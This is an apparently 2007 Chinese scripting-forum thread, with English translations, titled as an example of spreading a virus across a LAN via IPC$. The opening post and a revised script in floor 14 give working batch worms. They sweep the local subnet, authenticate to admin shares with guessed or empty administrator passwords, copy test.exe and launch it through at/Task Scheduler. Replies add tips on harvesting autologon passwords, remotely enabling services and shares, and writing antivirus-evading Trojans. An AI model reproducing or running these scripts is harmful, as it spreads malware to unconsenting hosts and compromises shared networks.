|
heicai
中级用户
积分 385
发帖 156
注册 2007-1-19
状态 离线
|
『楼 主』:
利用批处理在局域网内通过IPC$传播病毒的实例
使用 LLM 解释/回答一下
REM 局域网传播
for /f "tokens=2 delims=:" %%a in ('ipconfig ^| find /i "ip address"') do (set ip=%%
a&& goto :gof)
:gof
set "ip=%ip: =%"
for /f "tokens=1,2,3 delims=." %%b in ("%ip%") do (set ip1=1
call :bb %%b %%c %%d %ip1%)
:bb
set IP=%1.%2.%3.%ip1%
ping %IP% -n 2 | findstr /i "time<" && net use \\%IP%\ipc$ "1212" /user:"administrator" && copy test.exe \\%IP%\admin$ && start \\%IP%\admin$\test.exe
set /a ip1+=1
if %ip1% lss 255 goto :bb
exit
功能作下简单讲解:先列出本计算机的同一内网网段内的IP,分别对末尾1-254的IP进行PING测试,如果通,则复制文件到C:\windows\目录下并执行。不通则继续下一个IP,直到PING完254个IP。
在此特别对本论坛群内的“等待下一局”朋友作深刻感谢,一起帮我研究这段代码到午夜2点。
另外,发到论坛一方面与大家分享成果,一方面希望大家指点下。
如果有错误指正下,如果能完善的帮忙完善一下!
Last edited by heicai on 2007-2-6 at 01:52 AM ]
REM LAN propagation
for /f "tokens=2 delims=:" %%a in ('ipconfig ^| find /i "ip address"') do (set ip=%%
a&& goto :gof)
:gof
set "ip=%ip: =%"
for /f "tokens=1,2,3 delims=." %%b in ("%ip%") do (set ip1=1
call :bb %%b %%c %%d %ip1%)
:bb
set IP=%1.%2.%3.%ip1%
ping %IP% -n 2 | findstr /i "time<" && net use \\%IP%\ipc$ "1212" /user:"administrator" && copy test.exe \\%IP%\admin$ && start \\%IP%\admin$\test.exe
set /a ip1+=1
if %ip1% lss 255 goto :bb
exit
Function brief explanation: First list the IPs in the same LAN segment of this computer, respectively perform PING tests on the last 1-254 IPs. If it is reachable, copy the file to the C:\windows\ directory and execute it. If not reachable, continue to the next IP until all 254 IPs are PINGed.
Here, I would like to express deep gratitude to the friend "Waiting for the next game" in the forum group, who helped me study this code until 2 AM.
Also, post it to the forum to share the result with everyone and hope to get some guidance.
If there are errors, please point them out. If it can be improved, please help improve it!
Last edited by heicai on 2007-2-6 at 01:52 AM ]
|
|
 2007-2-6 14:49 |
|
|
heicai
中级用户
积分 385
发帖 156
注册 2007-1-19
状态 离线
|
『第 2 楼』:
使用 LLM 解释/回答一下
本人纯粹以学习的态度研究,并无恶意。请高人不要吝啬指点一下。
I am purely researching with a learning attitude and have no malice. Please, distinguished experts, don't be stingy to give some pointers.
|
|
|
2007-2-7 01:03 |
|
|
vkill
金牌会员
积分 4103
发帖 1744
注册 2006-1-20
来自 甘肃.临泽
状态 离线
|
『第 3 楼』:
使用 LLM 解释/回答一下
你就知道密码是:"1212"???
You just know the password is: "1212"?
|
|
|
2007-2-7 01:16 |
|
|
heicai
中级用户
积分 385
发帖 156
注册 2007-1-19
状态 离线
|
『第 4 楼』:
使用 LLM 解释/回答一下
密码是1212是随便设的,一般为空吧?觉得用字典之类太毫内存了。
The password is 1212, which is set randomly. Generally, it's empty? I think using a dictionary, etc., is too memory-consuming.
|
|
|
2007-2-7 03:38 |
|
|
kcdsw
中级用户
积分 404
发帖 179
注册 2006-3-30
状态 离线
|
『第 5 楼』:
使用 LLM 解释/回答一下
貌似很强
不过我有个一疑问,start 可以让别的机器执行文件么? 怕是执行到自己机器上了吧
你可以试试猫猫烧香
It seems quite powerful
But I have a question, can start make other machines execute files? I'm afraid it will execute on its own machine.
You can try Cat Mouse Burning Incense
|
|
|
2007-2-7 04:06 |
|
|
everest79
金牌会员
一叶枝头,万树皆春
积分 2564
发帖 1127
注册 2006-12-25
状态 离线
|
『第 6 楼』:
使用 LLM 解释/回答一下
你可以先分辨本机账户名称或在注册表查找是否有自动登录纪录,里边有当前账户的密码
若不为administator时可以增加administrator枚举并以空密码为凭据,不过SP2后安全策略不充许空密码进行远程访问
若像网吧因为账户都是相同的,一般默认共享与管理共享没有关闭的情况下,使用默认账户就可以连接
还有XP是自带有远程执行命令的工具,记不起名字了,你多查查
You can first identify the local account name or check the registry for automatic login records, which contain the password of the current account. If it is not administrator, you can add administrator enumeration and use the empty password as the credential. However, after SP2, the security policy does not allow remote access with an empty password.
If it is like an internet café where the accounts are all the same, generally, if the default share and administrative share are not closed, you can connect using the default account.
Also, XP has a built-in tool for remote execution of commands, but I can't remember the name. You can check more.
|
|
|
2007-2-7 09:22 |
|
|
lm959680
新手上路
积分 14
发帖 6
注册 2007-2-4
状态 离线
|
『第 7 楼』:
使用 LLM 解释/回答一下
rundll32 netplwiz.dll,UsersRunDll
注册表的我删除了 不知道路径了 也不知道用上面的方法 在注册表里有吗?
rundll32 netplwiz.dll,UsersRunDll
I deleted the registry and don't know the path. I also don't know if the above method is in the registry?
|
|
|
2007-2-7 23:12 |
|
|
heicai
中级用户
积分 385
发帖 156
注册 2007-1-19
状态 离线
|
『第 8 楼』:
使用 LLM 解释/回答一下
Originally posted by qingfushuan at 2007-2-7 10:32 AM:
纯粹建议,如果admin$被删除了呢,最好用net view命令看对方开了哪些共享再copy
帮我完善一下?
Originally posted by qingfushuan at 2007-2-7 10:32 AM:
Pure suggestion: If the admin$ is deleted, it's better to use the net view command to see which shares are open on the other side and then copy.
|
|
|
2007-2-8 12:49 |
|
|
kernelv
初级用户
积分 47
发帖 24
注册 2007-1-9
状态 离线
|
『第 9 楼』:
使用 LLM 解释/回答一下
这漏洞过时了,研究点别的吧,正如6楼朋友说的 SP2后安全策略不充许空密码进行远程访问了。
还有 start 可以运行远程程序?开玩笑吧,如果对方 Task Scheduler 服务开着使用计划任务还差不多。
不好意思啊,我可能多少打击了你的热情,不过没其他恶意的。
This loophole is outdated, let's study something else. Just as the friend on floor 6 said, after SP2, the security policy does not allow remote access with an empty password.
Also, can start run a remote program? You're kidding. It's more like if the other party has the Task Scheduler service enabled and uses scheduled tasks.
I'm sorry, I might have dampened your enthusiasm a bit, but there's no other malice.
|
|
|
2007-2-8 15:31 |
|
|
luobotou
新手上路
积分 16
发帖 7
注册 2006-9-29
来自 河南省南阳市
状态 离线
|
『第 10 楼』:
使用 LLM 解释/回答一下
对,如果对方 Task Scheduler 服务开着就好.而且你还要知道对方管理员密码.
net time \\%ip% /set /y
set/a hh=%time:~0,2%+0
set/a mm=1%time:~3,2%-100+1
if %mm% geq 60 (set/a mm=!mm!-60
set/a hh=!hh!+1
if %hh% geq 24 set/a hh=!hh!-24
)
at \\%ip% !hh!:!mm! %windir%\test.exe
在对方计算机上下一分钟运行指它程序
Yes, it's good if the other party's Task Scheduler service is on. And you also need to know the other party's administrator password.
net time \\%ip% /set /y
set/a hh=%time:~0,2%+0
set/a mm=1%time:~3,2%-100+1
if %mm% geq 60 (set/a mm=!mm!-60
set/a hh=!hh!+1
if %hh% geq 24 set/a hh=!hh!-24
)
at \\%ip% !hh!:!mm! %windir%\test.exe
It means running the target program on the other party's computer in the next minute
|
|
|
2007-3-8 00:24 |
|
|
h4ck3r
新手上路
积分 2
发帖 1
注册 2007-3-8
状态 离线
|
『第 11 楼』:
使用 LLM 解释/回答一下
at命令在xp2能使用?
呵,我試過不行喔。
Can the at command be used in XP2? Oh, I tried and it didn't work.
|
|
|
2007-3-8 02:01 |
|
|
scriptor
银牌会员
积分 1187
发帖 555
注册 2006-12-21
状态 离线
|
『第 12 楼』:
使用 LLM 解释/回答一下
老掉牙的了
谁还用这个
sp2 已经相对以前安全多了
It's outdated. Who still uses this? sp2 is already relatively safer than before.
|
|
|
2007-3-8 07:59 |
|
|
scriptor
银牌会员
积分 1187
发帖 555
注册 2006-12-21
状态 离线
|
『第 13 楼』:
使用 LLM 解释/回答一下
还不如搞一个木马放进去
自己写木马,要免杀
不过本人强烈反对搞破坏的
维护网络安全是我们每一个懂技术的人的责任
技术不是用来使坏的
尽管技术是把双刃剑
作为一个高科技人士
首先要加强自身的道德素质
只有这样
才不愧于这个称号
谢谢
It's better to make a Trojan horse and put it in. Write your own Trojan horse, and it needs to be undetected by antivirus software. However, I strongly oppose sabotage. Maintaining network security is the responsibility of every technologically literate person. Technology is a double-edged sword, but it shouldn't be used for malicious purposes. As a high-tech professional, one should first enhance their own moral quality. Only in this way can they live up to this title. Thanks
|
|
|
2007-3-8 08:02 |
|
|
bjsh
银牌会员
积分 2000
发帖 621
注册 2007-1-1
状态 离线
|
『第 14 楼』:
使用 LLM 解释/回答一下
lz的批处理有不少问题
首先ping %IP% -n 2 | findstr /i "time<" && 这一句就有可能漏掉不少;
有不少能ping上的没有"time<"而是"time="
不如用errorlevel来判断
其次copy test.exe \\%IP%\admin$这一句一般机器不会开着admin$的;
所以我先测下此机器能否在ipc$方面加以利用
sc \\%ip% config Schedule start= auto ^| find "SUCCESS"
我用的这一句;
一方面测试此机器的利用价值(如果远程连服务都无法改动设置的话则此机器连at命令也会执行不了也会拒绝访问)
一般如果这一步通过了;可以说此机器就可以被完全控制;
另一方面改变Schedule的启动模式(当然大部分机器这个是已经开着的)
net start Schedule
可以利用at命令
net time \\%ip% /set /y
for /f "tokens=1,2 delims=:" %%i in ("%time%") do set /a hh=%%i & set /a mm=%%j
set /a mm=%mm%+1
set tm=%hh%:0%mm%
at \\%ip% %tm% net share admin$
于是1分钟开启对方admin$
于是下面就是复制文件和启动了..............
下面是我修改后的..........
for /f "tokens=2 delims=:" %%a in ('ipconfig ^| find /i "ip address"') do (set ip=%%a&& goto :gof)
:gof
set "ip=%ip: =%"
for /f "tokens=1,2,3 delims=." %%b in ("%ip%") do (set ip1=1
call :bb %%b %%c %%d %ip1%)
:bb
set IP=%1.%2.%3.%ip1%
ping %IP% -n 2
if errorlevel 0 if not errorlevel 1 net use \\%IP%\ipc$ "" /user:administrator
if errorlevel 0 if not errorlevel 1 sc \\%ip% config Schedule start= auto ^| find "SUCCESS"
if errorlevel 0 if not errorlevel 1 sc start Schedule
net time \\%ip% /set /y
for /f "tokens=1,2 delims=:" %%i in ("%time%") do set /a hh=%%i & set /a mm=%%j
set /a mm=%mm%+1
set tm=%hh%:0%mm%
at \\%ip% %tm% net share admin$ ...............从这往下的个人觉得有点多余不如自己估计时间
:loop
if %time%==%tm%+1 (goto next) else (goto loop)
:next
copy test.exe \\%IP%\admin$
net time \\%ip% /set /y
for /f "tokens=1,2 delims=:" %%i in ("%time%") do set /a hh=%%i & set /a mm=%%j
set /a mm=%mm%+1
set tm=%hh%:0%mm%
at \\%ip% %tm% c:\windows\system32\test.exe
set /a ip1+=1
if %ip1% lss 255 goto :bb
exit
Last edited by bjsh on 2007-3-8 at 03:29 PM ]
LZ's batch processing has quite a few issues.
First, the sentence "ping %IP% -n 2 | findstr /i "time<" &&" may miss a lot; there are many that can ping but don't have "time<" but "time=". It's better to use errorlevel for judgment.
Second, the sentence "copy test.exe \\%IP%\admin$" generally, the admin$ won't be on ordinary machines; so I first test whether this machine can be exploited in terms of ipc$.
sc \\%ip% config Schedule start= auto ^| find "SUCCESS"
The sentence I use; on one hand, test the exploitable value of this machine (if the remote connection service can't even change settings, then this machine can't even execute at commands and will refuse access). Generally, if this step passes, it can be said that this machine can be completely controlled; on the other hand, change the startup mode of Schedule (of course, most machines this is already on).
net start Schedule
Can use at command
net time \\%ip% /set /y
for /f "tokens=1,2 delims=:" %%i in ("%time%") do set /a hh=%%i & set /a mm=%%j
set /a mm=%mm%+1
set tm=%hh%:0%mm%
at \\%ip% %tm% net share admin$
So start the other party's admin$ in 1 minute. Then the following is copying files and starting..............
Below is my modified one..........
for /f "tokens=2 delims=:" %%a in ('ipconfig ^| find /i "ip address"') do (set ip=%%a&& goto :gof)
:gof
set "ip=%ip: =%"
for /f "tokens=1,2,3 delims=." %%b in ("%ip%") do (set ip1=1
call :bb %%b %%c %%d %ip1%)
:bb
set IP=%1.%2.%3.%ip1%
ping %IP% -n 2
if errorlevel 0 if not errorlevel 1 net use \\%IP%\ipc$ "" /user:administrator
if errorlevel 0 if not errorlevel 1 sc \\%ip% config Schedule start= auto ^| find "SUCCESS"
if errorlevel 0 if not errorlevel 1 sc start Schedule
net time \\%ip% /set /y
for /f "tokens=1,2 delims=:" %%i in ("%time%") do set /a hh=%%i & set /a mm=%%j
set /a mm=%mm%+1
set tm=%hh%:0%mm%
at \\%ip% %tm% net share admin$ ...............From here down, I think it's a bit redundant, might as well estimate the time.
:loop
if %time%==%tm%+1 (goto next) else (goto loop)
:next
copy test.exe \\%IP%\admin$
net time \\%ip% /set /y
for /f "tokens=1,2 delims=:" %%i in ("%time%") do set /a hh=%%i & set /a mm=%%j
set /a mm=%mm%+1
set tm=%hh%:0%mm%
at \\%ip% %tm% c:\windows\system32\test.exe
set /a ip1+=1
if %ip1% lss 255 goto :bb
exit
Last edited by bjsh on 2007-3-8 at 03:29 PM ]
|
|
|
2007-3-8 10:25 |
|
|
heicai
中级用户
积分 385
发帖 156
注册 2007-1-19
状态 离线
|
『第 15 楼』:
使用 LLM 解释/回答一下
Originally posted by bjsh at 2007-3-8 10:25 AM:
lz的批处理有不少问题
首先ping %IP% -n 2 | findstr /i "time<" && 这一句就有可能漏掉不少;
有不少能ping上的没有"time<"而是"time ...
发现代码在检测192.168.0.1就停住了。
Originally posted by bjsh at 2007-3-8 10:25 AM:
There are quite a few problems with the batch script of the LZ.
First, the sentence "ping %IP% -n 2 | findstr /i "time<" &&" may miss a lot;
There are many that can be pinged but do not have "time<" but "time ...
Found that the code stops when detecting 192.168.0.1.
|
|
|
2007-5-28 17:39 |
|
